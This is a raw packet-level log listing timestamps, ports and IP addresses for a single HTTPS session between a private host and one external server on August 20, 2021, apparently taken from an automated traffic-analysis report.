Aug 20, 2021 17:09:47.778456926 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778464079 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778474092 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778491020 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778506994 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778523922 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778526068 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778539896 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778541088 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778559923 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778577089 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778578997 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778597116 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778613091 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778618097 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778630018 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778645992 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778661013 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778669119 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778675079 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.778687954 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.778731108 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781305075 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781323910 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781337023 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781352997 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781372070 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781389952 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781405926 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781421900 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781438112 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781455040 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781471968 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781469107 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781486988 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781502962 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781521082 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781536102 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781553030 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781569958 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781584978 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781600952 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781616926 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781619072 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781636953 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781655073 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781670094 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781667948 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781685114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781701088 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781712055 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781718016 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781775951 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781830072 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781847954 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781864882 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781872034 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781881094 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781903028 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781919003 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781934023 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781946898 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781953096 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781971931 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.781981945 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.781989098 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782006025 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782021046 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782033920 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782032967 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782054901 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782068968 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782211065 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782231092 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782248020 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782263994 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782280922 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782280922 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782298088 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782303095 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782314062 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782330036 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782346010 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782351017 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782365084 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782388926 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782388926 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782406092 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782418966 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782439947 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782448053 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782490015 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782597065 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782614946 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782630920 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782649040 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782668114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782685995 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782699108 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782702923 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782718897 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782736063 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782746077 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782753944 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782769918 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782776117 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782787085 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782807112 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782810926 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782826900 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782844067 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782860994 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782864094 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782879114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782896042 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782908916 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782922029 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782932043 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782933950 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782949924 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782965899 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782982111 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.782987118 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.782998085 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783014059 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783025026 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783030033 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783050060 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783052921 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783066988 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783082962 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783081055 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783098936 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783111095 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783143997 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783643007 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783663034 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783703089 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783716917 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783720970 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783736944 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783756018 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783772945 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783772945 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783790112 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783795118 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783807039 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783823013 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783838034 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783838034 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783854008 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783869982 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783879042 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783888102 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783898115 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783906937 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783922911 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783926010 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783938885 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783955097 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783965111 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.783971071 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.783987045 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784003019 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784007072 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784022093 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784027100 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784039021 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784054041 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784064054 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784070015 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784086943 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784101963 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784118891 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784133911 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784152985 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784169912 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784202099 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784259081 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784552097 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784569025 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784646034 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784665108 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784682989 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784698963 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784714937 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784730911 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784740925 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784765959 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784784079 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784812927 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784812927 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784822941 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784828901 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784845114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784861088 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784876108 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784885883 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784892082 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784908056 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784925938 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784929037 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784943104 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784959078 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.784962893 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784981966 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.784997940 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785013914 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785017014 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785029888 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785044909 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785053015 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785060883 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785077095 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785083055 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785092115 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785110950 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785120964 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785128117 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785142899 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785159111 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785180092 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785221100 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785403967 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785423994 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785455942 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785471916 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785473108 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785489082 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785506010 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785511017 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785521030 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785537004 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785540104 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785552979 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785568953 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785567045 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785588026 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785598040 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785604954 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785620928 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785636902 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785651922 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785660028 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785666943 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785682917 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785698891 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785710096 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785717964 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785731077 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785734892 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785752058 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785768032 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785784006 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785788059 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785799026 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785815001 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785830975 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785840988 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785862923 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785865068 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785878897 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785895109 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785922050 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785926104 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785938978 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785954952 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785952091 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.785974026 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.785990953 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786000013 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786005974 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786022902 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786026955 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786072969 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786437035 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786453962 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786467075 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786490917 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786506891 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786525011 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786526918 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786541939 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786557913 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786573887 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786572933 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786590099 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786604881 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786621094 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786636114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786654949 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786660910 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786672115 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786688089 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786703110 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786704063 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786719084 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786727905 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786735058 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786751986 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786755085 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786767006 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786811113 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786842108 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786858082 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786874056 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786876917 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786890030 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786906004 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786925077 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786933899 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786942959 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786957979 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786966085 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.786973953 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.786989927 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787004948 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787020922 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787024975 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.787036896 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787055016 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787060976 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.787071943 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787121058 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.787396908 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787416935 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787451982 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787468910 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787475109 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.787483931 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787503958 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787520885 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.787532091 CEST	49713	443	192.168.2.3	162.159.135.233
